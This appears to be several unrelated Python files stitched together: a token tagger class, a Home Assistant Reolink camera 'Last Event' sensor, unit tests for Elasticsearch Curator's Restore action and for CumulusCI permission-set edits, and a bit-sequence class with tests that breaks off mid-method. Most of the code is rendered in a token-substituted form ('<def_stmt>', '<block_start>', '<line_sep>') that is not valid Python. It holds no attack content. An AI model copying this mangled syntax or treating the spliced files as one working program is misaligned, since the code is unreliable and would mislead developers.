class Tagger(object):
    tags = []

    def __call__(self, tokens):
        raise NotImplementedError

    def check_tag(self, tag):
        return tag in self.tags


class PassTagger(Tagger):
    def __call__(self, tokens):
        for token in tokens:
            yield token


class TaggersComposition(Tagger):
    def __init__(self, taggers):
        self.taggers = taggers

    def __call__(self, tokens):
        for tagger in self.taggers:
            tokens = tagger(tokens)
        return tokens

    def check_tag(self, tag):
        return any(_.check_tag(tag) for _ in self.taggers)
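
A minimal usage sketch (not part of the original module) showing how TaggersComposition chains taggers over a token stream; the UppercaseTagger class and sample tokens below are hypothetical illustrations:

class UppercaseTagger(Tagger):
    tags = ["upper"]

    def __call__(self, tokens):
        for token in tokens:
            yield token.upper()


pipeline = TaggersComposition([PassTagger(), UppercaseTagger()])
print(list(pipeline(["a", "b"])))   # ['A', 'B']
print(pipeline.check_tag("upper"))  # True, because one composed tagger declares it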
|
"""This component provides support for Reolink IP VoD support."""<import_from_stmt>urllib.parse quote_plus<import_from_stmt>dataclasses dataclass<import_stmt>datetime<as>dt<import_stmt>asyncio<import_stmt>logging<import_stmt>os<import_from_stmt>dateutil relativedelta<import_from_stmt>homeassistant.core CALLBACK_TYPE HomeAssistant<import_stmt>homeassistant.util.dt<as>dt_utils<import_from_stmt>homeassistant.config_entries ConfigEntry<import_from_stmt>homeassistant.components.sensor DEVICE_CLASS_TIMESTAMP SensorEntity<import_from_stmt>.const BASE DOMAIN DOMAIN_DATA LAST_EVENT THUMBNAIL_EXTENSION THUMBNAIL_URL VOD_URL <import_from_stmt>.entity ReolinkEntity<import_from_stmt>.base ReolinkBase searchtime_to_datetime<import_from_stmt>.typings VoDEvent VoDEventThumbnail<line_sep>_LOGGER=logging.getLogger(__name__)<line_sep>@asyncio.coroutine<async_keyword><def_stmt>async_setup_entry hass:HomeAssistant config_entry async_add_devices<block_start>"""Set up the Reolink IP Camera switches."""<line_sep>devices=[]<line_sep>base:ReolinkBase=hass.data[DOMAIN][config_entry.entry_id][BASE]<line_sep># TODO : add playback (based off of hdd_info) to api capabilities
<await>base.api.get_switch_capabilities()<if_stmt>base.api.hdd_info<block_start>devices.append(LastEventSensor(hass config_entry))<block_end>async_add_devices(devices update_before_add=<false>)<block_end>@dataclass<class_stmt>_Attrs<block_start>oldest_day:dt.datetime=<none><line_sep>most_recent_day:dt.datetime=<none><line_sep>last_event:VoDEvent=<none><block_end><class_stmt>LastEventSensor(ReolinkEntity SensorEntity)<block_start>"""An implementation of a Reolink IP camera sensor."""<def_stmt>__init__ self hass:HomeAssistant config:ConfigEntry<block_start>"""Initialize a Reolink camera."""<line_sep>ReolinkEntity.__init__(self hass config)<line_sep>SensorEntity.__init__(self)<line_sep>self._attrs=_Attrs()<line_sep>self._bus_listener:CALLBACK_TYPE=<none><line_sep>self._entry_id=config.entry_id<block_end><async_keyword><def_stmt>async_added_to_hass self<arrow><none><block_start>"""Entity created."""<line_sep><await>super().async_added_to_hass()<line_sep>self._bus_listener=self.hass.bus.async_listen(self._base.event_id self.handle_event)<line_sep>self._hass.async_add_job(self._update_event_range)<block_end><async_keyword><def_stmt>async_will_remove_from_hass self<block_start>"""Entity removed"""<if_stmt>self._bus_listener<block_start>self._bus_listener()<line_sep>self._bus_listener=<none><block_end><await>super().async_will_remove_from_hass()<block_end><async_keyword><def_stmt>request_refresh self<block_start>""" force an update of the sensor """<line_sep><await>super().request_refresh()<line_sep>self._hass.async_add_job(self._update_event_range)<block_end><async_keyword><def_stmt>async_update self<block_start>""" polling update """<line_sep><await>super().async_update()<line_sep>self._hass.async_add_job(self._update_event_range)<block_end><async_keyword><def_stmt>_update_event_range self<block_start>end=dt_utils.now()<line_sep>start=self._attrs.most_recent_day<if_stmt><not>start<block_start>start=dt.datetime.combine(end.date().replace(day=1) dt.time.min)<if_stmt>self._base.playback_months<g>1<block_start>start<augsub>relativedelta.relativedelta(months=int(self._base.playback_months))<block_end><block_end>search,_=<await>self._base.send_search(start end <true>)<if_stmt><not>search<or>len(search)<l>1<block_start><return><block_end>entry=search[0]<line_sep>self._attrs.oldest_day=dt.datetime(entry["year"] entry["mon"] next((i<for>(i e) enumerate(entry["table"] start=1)<if>e<eq>"1")) tzinfo=end.tzinfo )<line_sep>entry=search[-1]<line_sep>start=self._attrs.most_recent_day=dt.datetime(entry["year"] entry["mon"] len(entry["table"])-next((i<for>(i e) enumerate(reversed(entry["table"]) start=0)<if>e<eq>"1")) tzinfo=end.tzinfo )<line_sep>end=dt.datetime.combine(start.date() dt.time.max tzinfo=end.tzinfo)<line_sep>_,files=<await>self._base.send_search(start end)<line_sep>file=files[-1]<if>files<and>len(files)<g>0<else><none><if_stmt>file<is><none><block_start><return><block_end>filename=file.get("name" "")<if_stmt>len(filename)<eq>0<block_start>_LOGGER.info("Search command provided a file record without a name: %s" str(file))<block_end>end=searchtime_to_datetime(file["EndTime"] start.tzinfo)<line_sep>start=searchtime_to_datetime(file["StartTime"] end.tzinfo)<line_sep>last=self._attrs.last_event=VoDEvent(str(start.timestamp()) start end-start filename )<line_sep>last.url=VOD_URL.format(camera_id=self._entry_id event_id=quote_plus(filename))<line_sep>thumbnail=last.thumbnail=VoDEventThumbnail(THUMBNAIL_URL.format(camera_id=self._entry_id event_id=last.event_id) path=os.path.join(self._base.thumbnail_path 
f"{last.event_id}.{THUMBNAIL_EXTENSION}") )<line_sep>thumbnail.exists=os.path.isfile(thumbnail.path)<line_sep>data:dict=self._hass.data.setdefault(DOMAIN_DATA {})<line_sep>data=data.setdefault(self._base.unique_id {})<line_sep>data[LAST_EVENT]=last<line_sep>self._state=<true><line_sep>self.async_schedule_update_ha_state()<block_end><async_keyword><def_stmt>handle_event self event<block_start>"""Handle incoming event for VoD update"""<if_stmt><not>"motion"<in>event.data<block_start><return><block_end>self._hass.async_add_job(self._update_event_range)<block_end>@property<def_stmt>unique_id self<block_start>"""Return Unique ID string."""<line_sep><return>f"reolink_lastevent_{self._base.unique_id}"<block_end>@property<def_stmt>name self<block_start>"""Return the name of this sensor."""<line_sep><return>f"{self._base.name} Last Event"<block_end>@property<def_stmt>device_class self<block_start>"""Device class of the sensor."""<line_sep><return>DEVICE_CLASS_TIMESTAMP<block_end>@property<def_stmt>state self<block_start>"""Return the state of the sensor."""<if_stmt><not>self._state<block_start><return><none><block_end>date=(self._attrs.last_event.start<if>self._attrs.last_event<and>self._attrs.last_event.start<else><none>)<if_stmt><not>date<block_start><return><none><block_end><return>date.isoformat()<block_end>@property<def_stmt>icon self<block_start>"""Icon of the sensor."""<line_sep><return>"mdi:history"<block_end>@property<def_stmt>extra_state_attributes self<block_start>"""Return the state attributes."""<line_sep>attrs=super().extra_state_attributes<if_stmt>self._state<block_start><if_stmt>attrs<is><none><block_start>attrs={}<block_end><if_stmt>self._attrs.oldest_day<block_start>attrs["oldest_day"]=self._attrs.oldest_day.isoformat()<block_end><if_stmt>self._attrs.last_event<block_start><if_stmt>self._attrs.last_event.event_id<block_start>attrs["vod_event_id"]=self._attrs.last_event.event_id<if_stmt>self._attrs.last_event.thumbnail<block_start>attrs["has_thumbnail"]=("true"<if>self._attrs.last_event.thumbnail.exists<else>"false")<line_sep>attrs["thumbnail_path"]=self._attrs.last_event.thumbnail.path<block_end><block_end><if_stmt>self._attrs.last_event.duration<block_start>attrs["duration"]=str(self._attrs.last_event.duration)<block_end><block_end><block_end><return>attrs<block_end><block_end>
|
<import_from_stmt>unittest TestCase<import_from_stmt>mock Mock patch<import_stmt>elasticsearch<import_stmt>curator<line_sep># Get test variables and constants from a single source
<import_from_stmt>. testvars<as>testvars<class_stmt>TestActionRestore(TestCase)<block_start><def_stmt>test_init_raise_bad_snapshot_list self<block_start>self.assertRaises(TypeError curator.Restore 'invalid')<block_end><def_stmt>test_init_raise_unsuccessful_snapshot_list self<block_start>client=Mock()<line_sep>client.snapshot.get.return_value=testvars.partial<line_sep>client.snapshot.get_repository.return_value=testvars.test_repo<line_sep>slo=curator.SnapshotList(client repository=testvars.repo_name)<line_sep>self.assertRaises(curator.CuratorException curator.Restore slo)<block_end><def_stmt>test_snapshot_derived_name self<block_start>client=Mock()<line_sep>client.snapshot.get.return_value=testvars.snapshots<line_sep>client.snapshot.get_repository.return_value=testvars.test_repo<line_sep>slo=curator.SnapshotList(client repository=testvars.repo_name)<line_sep>ro=curator.Restore(slo)<line_sep>self.assertEqual('snapshot-2015.03.01' ro.name)<block_end><def_stmt>test_provided_name self<block_start>client=Mock()<line_sep>client.snapshot.get.return_value=testvars.snapshots<line_sep>client.snapshot.get_repository.return_value=testvars.test_repo<line_sep>slo=curator.SnapshotList(client repository=testvars.repo_name)<line_sep>ro=curator.Restore(slo name=testvars.snap_name)<line_sep>self.assertEqual(testvars.snap_name ro.name)<block_end><def_stmt>test_partial_snap self<block_start>client=Mock()<line_sep>client.snapshot.get.return_value=testvars.partial<line_sep>client.snapshot.get_repository.return_value=testvars.test_repo<line_sep>slo=curator.SnapshotList(client repository=testvars.repo_name)<line_sep>ro=curator.Restore(slo partial=<true>)<line_sep>self.assertEqual(testvars.snap_name ro.name)<block_end><def_stmt>test_provided_indices self<block_start>client=Mock()<line_sep>client.snapshot.get.return_value=testvars.snapshots<line_sep>client.snapshot.get_repository.return_value=testvars.test_repo<line_sep>slo=curator.SnapshotList(client repository=testvars.repo_name)<line_sep>ro=curator.Restore(slo indices=testvars.named_indices)<line_sep>self.assertEqual('snapshot-2015.03.01' ro.name)<block_end><def_stmt>test_extra_settings self<block_start>client=Mock()<line_sep>client.snapshot.get.return_value=testvars.snapshots<line_sep>client.snapshot.get_repository.return_value=testvars.test_repo<line_sep>slo=curator.SnapshotList(client repository=testvars.repo_name)<line_sep>ro=curator.Restore(slo extra_settings={'foo':'bar'})<line_sep>self.assertEqual(ro.body['foo'] 'bar')<block_end><def_stmt>test_bad_extra_settings self<block_start>client=Mock()<line_sep>client.snapshot.get.return_value=testvars.snapshots<line_sep>client.snapshot.get_repository.return_value=testvars.test_repo<line_sep>slo=curator.SnapshotList(client repository=testvars.repo_name)<line_sep>ro=curator.Restore(slo extra_settings='invalid')<line_sep>self.assertEqual(ro.body {'ignore_unavailable':<false> 'partial':<false> 'include_aliases':<false> 'rename_replacement':'' 'rename_pattern':'' 'indices':['index-2015.01.01' 'index-2015.02.01'] 'include_global_state':<false>})<block_end><def_stmt>test_get_expected_output self<block_start>client=Mock()<line_sep>client.snapshot.get.return_value=testvars.snapshots<line_sep>client.snapshot.get_repository.return_value=testvars.test_repo<line_sep>slo=curator.SnapshotList(client repository=testvars.repo_name)<line_sep>ro=curator.Restore(slo rename_pattern='(.+)' rename_replacement='new_$1')<line_sep>self.assertEqual(ro.expected_output ['new_index-2015.01.01' 
'new_index-2015.02.01'])<block_end><def_stmt>test_do_dry_run self<block_start>client=Mock()<line_sep>client.snapshot.get.return_value=testvars.snapshots<line_sep>client.snapshot.get_repository.return_value=testvars.test_repo<line_sep>slo=curator.SnapshotList(client repository=testvars.repo_name)<line_sep>ro=curator.Restore(slo)<line_sep>self.assertIsNone(ro.do_dry_run())<block_end><def_stmt>test_do_dry_run_with_renames self<block_start>client=Mock()<line_sep>client.snapshot.get.return_value=testvars.snapshots<line_sep>client.snapshot.get_repository.return_value=testvars.test_repo<line_sep>slo=curator.SnapshotList(client repository=testvars.repo_name)<line_sep>ro=curator.Restore(slo rename_pattern='(.+)' rename_replacement='new_$1')<line_sep>self.assertIsNone(ro.do_dry_run())<block_end><def_stmt>test_report_state_all self<block_start>client=Mock()<line_sep>client.info.return_value={'version':{'number':'5.0.0'}}<line_sep>client.snapshot.get.return_value=testvars.snapshot<line_sep>client.snapshot.get_repository.return_value=testvars.test_repo<line_sep>client.indices.get_settings.return_value=testvars.settings_named<line_sep>slo=curator.SnapshotList(client repository=testvars.repo_name)<line_sep>ro=curator.Restore(slo)<line_sep>self.assertIsNone(ro.report_state())<block_end><def_stmt>test_report_state_not_all self<block_start>client=Mock()<line_sep>client.info.return_value={'version':{'number':'5.0.0'}}<line_sep>client.snapshot.get.return_value=testvars.snapshots<line_sep>client.snapshot.get_repository.return_value=testvars.test_repo<line_sep>client.indices.get_settings.return_value=testvars.settings_one<line_sep>slo=curator.SnapshotList(client repository=testvars.repo_name)<line_sep>ro=curator.Restore(slo rename_pattern='(.+)' rename_replacement='new_$1')<line_sep>self.assertRaises(curator.exceptions.FailedRestore ro.report_state)<block_end><def_stmt>test_do_action_success self<block_start>client=Mock()<line_sep>client.info.return_value={'version':{'number':'5.0.0'}}<line_sep>client.snapshot.get.return_value=testvars.snapshots<line_sep>client.snapshot.get_repository.return_value=testvars.test_repo<line_sep>client.snapshot.status.return_value=testvars.nosnap_running<line_sep>client.snapshot.verify_repository.return_value=testvars.verified_nodes<line_sep>client.indices.get_settings.return_value=testvars.settings_named<line_sep>client.indices.recovery.return_value=testvars.recovery_output<line_sep>slo=curator.SnapshotList(client repository=testvars.repo_name)<line_sep>ro=curator.Restore(slo wait_interval=0.5 max_wait=1)<line_sep>self.assertIsNone(ro.do_action())<block_end><def_stmt>test_do_action_snap_in_progress self<block_start>client=Mock()<line_sep>client.snapshot.get.return_value=testvars.snapshots<line_sep>client.snapshot.get_repository.return_value=testvars.test_repo<line_sep>client.snapshot.status.return_value=testvars.snap_running<line_sep>client.snapshot.verify_repository.return_value=testvars.verified_nodes<line_sep>client.indices.get_settings.return_value=testvars.settings_named<line_sep>slo=curator.SnapshotList(client repository=testvars.repo_name)<line_sep>ro=curator.Restore(slo)<line_sep>self.assertRaises(curator.SnapshotInProgress ro.do_action)<block_end><def_stmt>test_do_action_success_no_wfc 
self<block_start>client=Mock()<line_sep>client.snapshot.get.return_value=testvars.snapshots<line_sep>client.snapshot.get_repository.return_value=testvars.test_repo<line_sep>client.snapshot.status.return_value=testvars.nosnap_running<line_sep>client.snapshot.verify_repository.return_value=testvars.verified_nodes<line_sep>client.indices.get_settings.return_value=testvars.settings_named<line_sep>slo=curator.SnapshotList(client repository=testvars.repo_name)<line_sep>ro=curator.Restore(slo wait_for_completion=<false>)<line_sep>self.assertIsNone(ro.do_action())<block_end><def_stmt>test_do_action_report_on_failure self<block_start>client=Mock()<line_sep>client.snapshot.get.return_value=testvars.snapshots<line_sep>client.snapshot.get_repository.return_value=testvars.test_repo<line_sep>client.snapshot.status.return_value=testvars.nosnap_running<line_sep>client.snapshot.verify_repository.return_value=testvars.verified_nodes<line_sep>client.indices.get_settings.return_value=testvars.settings_named<line_sep>client.snapshot.restore.side_effect=testvars.fake_fail<line_sep>slo=curator.SnapshotList(client repository=testvars.repo_name)<line_sep>ro=curator.Restore(slo)<line_sep>self.assertRaises(curator.FailedExecution ro.do_action)<block_end><block_end>
|
import pytest

from cumulusci.core.exceptions import TaskOptionsError
from cumulusci.tasks.metadata_etl import AddPermissionSetPermissions
from cumulusci.tasks.salesforce.tests.util import create_task
from cumulusci.utils.xml import metadata_tree

MD = "{%s}" % metadata_tree.METADATA_NAMESPACE

PERMSET_XML = b"""<?xml version="1.0" encoding="UTF-8"?>
<PermissionSet xmlns="http://soap.sforce.com/2006/04/metadata">
<applicationVisibilities>
<application>CustomApp</application>
<visible>false</visible>
</applicationVisibilities>
<classAccesses>
<apexClass>ApexController</apexClass>
<enabled>false</enabled>
</classAccesses>
<fieldPermissions>
<editable>false</editable>
<field>Test__c.Lookup__c</field>
<readable>false</readable>
</fieldPermissions>
<hasActivationRequired>false</hasActivationRequired>
<label>Test</label>
<objectPermissions>
<allowCreate>false</allowCreate>
<allowDelete>false</allowDelete>
<allowEdit>false</allowEdit>
<allowRead>false</allowRead>
<modifyAllRecords>false</modifyAllRecords>
<object>Test__c</object>
<viewAllRecords>false</viewAllRecords>
</objectPermissions>
<recordTypeVisibilities>
<recordType>Case.Test</recordType>
<visible>true</visible>
</recordTypeVisibilities>
<tabSettings>
<tab>standard-report</tab>
<visibility>Visible</visibility>
</tabSettings>
<userPermissions>
<enabled>true</enabled>
<name>ActivitiesAccess</name>
</userPermissions>
</PermissionSet>
"""<class_stmt>TestAddPermissionSetPermissions<block_start><def_stmt>test_adds_new_field_permission self<block_start>task=create_task(AddPermissionSetPermissions {"managed":<true> "api_version":"47.0" "api_names":"bar,foo" "field_permissions":[{"field":"Test__c.Description__c" "readable":<true> "editable":<true> }] } )<line_sep>tree=metadata_tree.fromstring(PERMSET_XML)<line_sep>element=tree._element<assert_stmt>(len(element.findall(f".//{MD}fieldPermissions[{MD}field='Test__c.Description__c']"))<eq>0)<line_sep>task._transform_entity(tree "PermSet")<line_sep>fieldPermissions=element.findall(f".//{MD}fieldPermissions[{MD}field='Test__c.Description__c']")<assert_stmt>len(fieldPermissions)<eq>1<line_sep>readable=fieldPermissions[0].findall(f".//{MD}readable")<assert_stmt>len(readable)<eq>1<assert_stmt>readable[0].text<eq>"true"<line_sep>editable=fieldPermissions[0].findall(f".//{MD}editable")<assert_stmt>len(editable)<eq>1<assert_stmt>editable[0].text<eq>"true"<block_end><def_stmt>test_updates_existing_field_permission self<block_start>task=create_task(AddPermissionSetPermissions {"managed":<true> "api_version":"47.0" "api_names":"bar,foo" "field_permissions":[{"field":"Test__c.Lookup__c" "readable":<true> "editable":<true>}] } )<line_sep>tree=metadata_tree.fromstring(PERMSET_XML)<line_sep>element=tree._element<assert_stmt>(len(element.findall(f".//{MD}fieldPermissions[{MD}field='Test__c.Lookup__c']"))<eq>1)<line_sep>task._transform_entity(tree "PermSet")._element<line_sep>fieldPermissions=element.findall(f".//{MD}fieldPermissions[{MD}field='Test__c.Lookup__c']")<assert_stmt>len(fieldPermissions)<eq>1<line_sep>readable=fieldPermissions[0].findall(f".//{MD}readable")<assert_stmt>len(readable)<eq>1<assert_stmt>readable[0].text<eq>"true"<line_sep>editable=fieldPermissions[0].findall(f".//{MD}editable")<assert_stmt>len(editable)<eq>1<assert_stmt>editable[0].text<eq>"true"<block_end><def_stmt>test_adds_new_class_permission self<block_start>task=create_task(AddPermissionSetPermissions {"managed":<true> "api_version":"47.0" "api_names":"bar,foo" "class_accesses":[{"apexClass":"LWCController" "enabled":<true>}] } )<line_sep>tree=metadata_tree.fromstring(PERMSET_XML)<line_sep>element=tree._element<assert_stmt>(len(element.findall(f".//{MD}classAccesses[{MD}apexClass='LWCController']"))<eq>0)<line_sep>task._transform_entity(tree "PermSet")<line_sep>classAccesses=element.findall(f".//{MD}classAccesses[{MD}apexClass='LWCController']")<assert_stmt>len(classAccesses)<eq>1<line_sep>enabled=classAccesses[0].findall(f".//{MD}enabled")<assert_stmt>len(enabled)<eq>1<assert_stmt>enabled[0].text<eq>"true"<block_end><def_stmt>test_upserts_existing_class_permission self<block_start>task=create_task(AddPermissionSetPermissions {"managed":<true> "api_version":"47.0" "api_names":"bar,foo" "class_accesses":[{"apexClass":"ApexController" "enabled":<true>}] } )<line_sep>tree=metadata_tree.fromstring(PERMSET_XML)<line_sep>element=tree._element<assert_stmt>(len(element.findall(f".//{MD}classAccesses[{MD}apexClass='ApexController']"))<eq>1)<line_sep>task._transform_entity(tree "PermSet")._element<line_sep>classAccesses=element.findall(f".//{MD}classAccesses[{MD}apexClass='ApexController']")<assert_stmt>len(classAccesses)<eq>1<line_sep>enabled=classAccesses[0].findall(f".//{MD}enabled")<assert_stmt>len(enabled)<eq>1<assert_stmt>enabled[0].text<eq>"true"<block_end><def_stmt>test_missing_apexclass_throws_exception self<block_start>task=create_task(AddPermissionSetPermissions {"managed":<true> "api_version":"47.0" 
"api_names":"bar,foo" "class_accesses":[{"enabled":<true>}] } )<line_sep>tree=metadata_tree.fromstring(PERMSET_XML)<with_stmt>pytest.raises(TaskOptionsError)<block_start>task._transform_entity(tree "PermSet")<block_end><block_end><def_stmt>test_missing_field_throws_exception self<block_start>task=create_task(AddPermissionSetPermissions {"managed":<true> "api_version":"47.0" "api_names":"bar,foo" "field_permissions":[{"readable":<true>}] } )<line_sep>tree=metadata_tree.fromstring(PERMSET_XML)<with_stmt>pytest.raises(TaskOptionsError)<block_start>task._transform_entity(tree "PermSet")<block_end><block_end><block_end>
|
<import_stmt>re<import_stmt>operator<import_from_stmt>functools reduce<import_stmt>collections.abc<line_sep>__all__=["bits"]<class_stmt>bits<block_start>"""An immutable bit sequence, like ``bytes`` but for bits.
This bit sequence is ordered from LSB to MSB; this is the direction in which it is converted
to and from iterators, and to and from bytes. Note, however, that it is converted to and from
strings (which should be only used where a human-readable form is required) from MSB to LSB;
this matches the way integer literals are written, as well as values in datasheets and other
documentation.
"""<line_sep>__slots__=["_len_" "_int_"]<line_sep>@classmethod<def_stmt>from_int cls value length=<none><block_start>value=operator.index(value)<if_stmt>length<is><none><block_start><if_stmt>value<l>0<block_start><raise>ValueError("invalid negative input for bits(): '{}'".format(value))<block_end>length=value.bit_length()<block_end><else_stmt><block_start>length=operator.index(length)<line_sep>value<augand>~(-1<lshift>length)<block_end>inst=object.__new__(cls)<line_sep>inst._len_=length<line_sep>inst._int_=value<line_sep><return>inst<block_end>@classmethod<def_stmt>from_str cls value<block_start>value=re.sub(r"[\s_]" "" value)<if_stmt>value<block_start><if_stmt>value[0]<eq>"-"<block_start><raise>ValueError("invalid negative input for bits(): '{}'".format(value))<block_end><elif_stmt>value[0]<eq>"+"<block_start>length=len(value)-1<block_end><else_stmt><block_start>length=len(value)<block_end><return>cls.from_int(int(value 2) length)<block_end><else_stmt><block_start><return>cls.from_int(0)<block_end><block_end>@classmethod<def_stmt>from_iter cls iterator<block_start>length=-1<line_sep>value=0<for_stmt>length,bit enumerate(iterator)<block_start>value<augor>bool(bit)<lshift>length<block_end><return>cls.from_int(value length+1)<block_end>@classmethod<def_stmt>from_bytes cls value length<block_start><return>cls.from_int(int.from_bytes(value "little") length)<block_end><def_stmt>__new__ cls value=0 length=<none><block_start><if_stmt>isinstance(value cls)<block_start><if_stmt>length<is><none><block_start><return>value<block_end><else_stmt><block_start><return>cls.from_int(value._int_ length)<block_end><block_end><if_stmt>isinstance(value int)<block_start><return>cls.from_int(value length)<block_end><if_stmt>isinstance(value str)<block_start><if_stmt>length<is><not><none><block_start><raise>ValueError("invalid input for bits(): when converting from str "<concat>"length must not be provided")<block_end><return>cls.from_str(value)<block_end><if_stmt>isinstance(value (bytes bytearray memoryview))<block_start><if_stmt>length<is><none><block_start><raise>ValueError("invalid input for bits(): when converting from bytes "<concat>"length must be provided")<block_end><return>cls.from_bytes(value length)<block_end><if_stmt>isinstance(value collections.abc.Iterable)<block_start><if_stmt>length<is><not><none><block_start><raise>ValueError("invalid input for bits(): when converting from an iterable "<concat>"length must not be provided")<block_end><return>cls.from_iter(value)<block_end><raise>TypeError("invalid input for bits(): cannot convert from {}".format(value.__class__.__name__))<block_end><def_stmt>__len__ self<block_start><return>self._len_<block_end><def_stmt>__bool__ self<block_start><return>bool(self._len_)<block_end><def_stmt>to_int self<block_start><return>self._int_<block_end>__int__=to_int<def_stmt>to_str self<block_start><if_stmt>self._len_<block_start><return>format(self._int_ "0{}b".format(self._len_))<block_end><return>""<block_end>__str__=to_str<def_stmt>to_bytes self<block_start><return>self._int_.to_bytes((self._len_+7)<floordiv>8 "little")<block_end>__bytes__=to_bytes<def_stmt>__repr__ self<block_start><return>"bits('{}')".format(self)<block_end><def_stmt>__getitem__ self key<block_start><if_stmt>isinstance(key int)<block_start><if_stmt>key<l>0<block_start><return>(self._int_<rshift>(self._len_+key))&1<block_end><else_stmt><block_start><return>(self._int_<rshift>key)&1<block_end><block_end><if_stmt>isinstance(key 
slice)<block_start>start,stop,step=key.indices(self._len_)<assert_stmt>step<eq>1<if_stmt>stop<l>start<block_start><return>self.__class__()<block_end><else_stmt><block_start><return>self.__class__(self._int_<rshift>start stop-start)<block_end><block_end><raise>TypeError("bits indices must be integers or slices, not {}".format(key.__class__.__name__))<block_end><def_stmt>__iter__ self<block_start><for_stmt>bit range(self._len_)<block_start><yield>(self._int_<rshift>bit)&1<block_end><block_end><def_stmt>__eq__ self other<block_start><try_stmt><block_start>other=self.__class__(other)<block_end><except_stmt>TypeError<block_start><return><false><block_end><return>self._len_<eq>other._len_<and>self._int_<eq>other._int_<block_end><def_stmt>__add__ self other<block_start>other=self.__class__(other)<line_sep><return>self.__class__(self._int_|(other._int_<lshift>self._len_) self._len_+other._len_)<block_end><def_stmt>__radd__ self other<block_start>other=self.__class__(other)<line_sep><return>other+self<block_end><def_stmt>__mul__ self other<block_start><if_stmt>isinstance(other int)<block_start><return>self.__class__(reduce(<lambda>a b:(a<lshift>self._len_)|b (self._int_<for>_ range(other)) 0) self._len_<times>other)<block_end><return>NotImplemented<block_end><def_stmt>__rmul__ self other<block_start><return>self<times>other<block_end><def_stmt>__and__ self other<block_start>other=self.__class__(other)<line_sep><return>self.__class__(self._int_&other._int_ max(self._len_ other._len_))<block_end><def_stmt>__rand__ self other<block_start>other=self.__class__(other)<line_sep><return>self&other<block_end><def_stmt>__or__ self other<block_start>other=self.__class__(other)<line_sep><return>self.__class__(self._int_|other._int_ max(self._len_ other._len_))<block_end><def_stmt>__ror__ self other<block_start>other=self.__class__(other)<line_sep><return>self|other<block_end><def_stmt>__xor__ self other<block_start>other=self.__class__(other)<line_sep><return>self.__class__(self._int_^other._int_ max(self._len_ other._len_))<block_end><def_stmt>__rxor__ self other<block_start>other=self.__class__(other)<line_sep><return>self^other<block_end><def_stmt>reversed self<block_start>value=0<for_stmt>bit range(self._len_)<block_start>value<auglshift>1<if_stmt>(self._int_<rshift>bit)&1<block_start>value<augor>1<block_end><block_end><return>self.__class__(value self._len_)<block_end><def_stmt>find self sub start=0 end=-1<block_start>sub=self.__class__(sub)<if_stmt>start<l>0<block_start>start=self._len_-start<block_end><if_stmt>end<l>0<block_start>end=self._len_-end<block_end><for_stmt>pos range(start end)<block_start><if_stmt>self[pos:pos+len(sub)]<eq>sub<block_start><return>pos<block_end><block_end><else_stmt><block_start><return>-1<block_end><block_end><block_end># -------------------------------------------------------------------------------------------------
<import_stmt>unittest<class_stmt>BitsTestCase(unittest.TestCase)<block_start><def_stmt>assertBits self value bit_length bit_value<block_start>self.assertIsInstance(value bits)<line_sep>self.assertEqual(value._len_ bit_length)<line_sep>self.assertEqual(value._int_ bit_value)<block_end><def_stmt>test_from_int self<block_start>self.assertBits(bits.from_int(0) 0 0b0)<line_sep>self.assertBits(bits.from_int(1) 1 0b1)<line_sep>self.assertBits(bits.from_int(2) 2 0b10)<line_sep>self.assertBits(bits.from_int(2 5) 5 0b00010)<line_sep>self.assertBits(bits.from_int(0b110 2) 2 0b10)<line_sep>self.assertBits(bits.from_int(-1 16) 16 0xffff)<block_end><def_stmt>test_from_int_wrong self<block_start><with_stmt>self.assertRaisesRegex(ValueError r"invalid negative input for bits\(\): '-1'")<block_start>bits.from_int(-1)<block_end><block_end><def_stmt>test_from_str self<block_start>self.assertBits(bits.from_str("") 0 0b0)<line_sep>self.assertBits(bits.from_str("0") 1 0b0)<line_sep>self.assertBits(bits.from_str("010") 3 0b010)<line_sep>self.assertBits(bits.from_str("0 1 011_100") 8 0b01011100)<line_sep>self.assertBits(bits.from_str("+0 1 \t011_100") 8 0b01011100)<block_end><def_stmt>test_from_str_wrong self<block_start><with_stmt>self.assertRaisesRegex(ValueError r"invalid negative input for bits\(\): '-1'")<block_start>bits.from_str("-1")<block_end><with_stmt>self.assertRaisesRegex(ValueError r"invalid literal for int\(\) with base 2: '23'")<block_start>bits.from_str("23")<block_end><block_end><def_stmt>test_from_bytes self<block_start>self.assertBits(bits.from_bytes(b"\xa5" 8) 8 0b10100101)<line_sep>self.assertBits(bits.from_bytes(b"\xa5\x01" 9) 9 0b110100101)<line_sep>self.assertBits(bits.from_bytes(b"\xa5\xff" 9) 9 0b110100101)<block_end><def_stmt>test_from_iter self<block_start>self.assertBits(bits.from_iter(iter([])) 0 0b0)<line_sep>self.assertBits(bits.from_iter(iter([1 1 0 1 0 0 1])) 7 0b1001011)<block_end><def_stmt>test_new self<block_start>self.assertBits(bits() 0 0b0)<line_sep>self.assertBits(bits(10) 4 0b1010)<line_sep>self.assertBits(bits(10 2) 2 0b10)<line_sep>self.assertBits(bits("1001") 4 0b1001)<line_sep>self.assertBits(bits(b"\xa5\x01" 9) 9 0b110100101)<line_sep>self.assertBits(bits(bytearray(b"\xa5\x01") 9) 9 0b110100101)<line_sep>self.assertBits(bits(memoryview(b"\xa5\x01") 9) 9 0b110100101)<line_sep>self.assertBits(bits([1 1 0 1 0 0 1]) 7 0b1001011)<line_sep>self.assertBits(bits(bits("1001") 2) 2 0b01)<line_sep>some=bits("1001")<line_sep>self.assertIs(bits(some) some)<block_end><def_stmt>test_new_wrong self<block_start><with_stmt>self.assertRaisesRegex(TypeError r"invalid input for bits\(\): cannot convert from float")<block_start>bits(1.0)<block_end><with_stmt>self.assertRaisesRegex(ValueError r"invalid input for bits\(\): when converting from str "<concat>r"length must not be provided")<block_start>bits("1010" 5)<block_end><with_stmt>self.assertRaisesRegex(ValueError r"invalid input for bits\(\): when converting from bytes "<concat>r"length must be provided")<block_start>bits(b"\xa5")<block_end><with_stmt>self.assertRaisesRegex(ValueError r"invalid input for bits\(\): when converting from an iterable "<concat>r"length must not be provided")<block_start>bits([1 0 1 0] 5)<block_end><block_end><def_stmt>test_len self<block_start>self.assertEqual(len(bits(10)) 4)<block_end><def_stmt>test_bool 
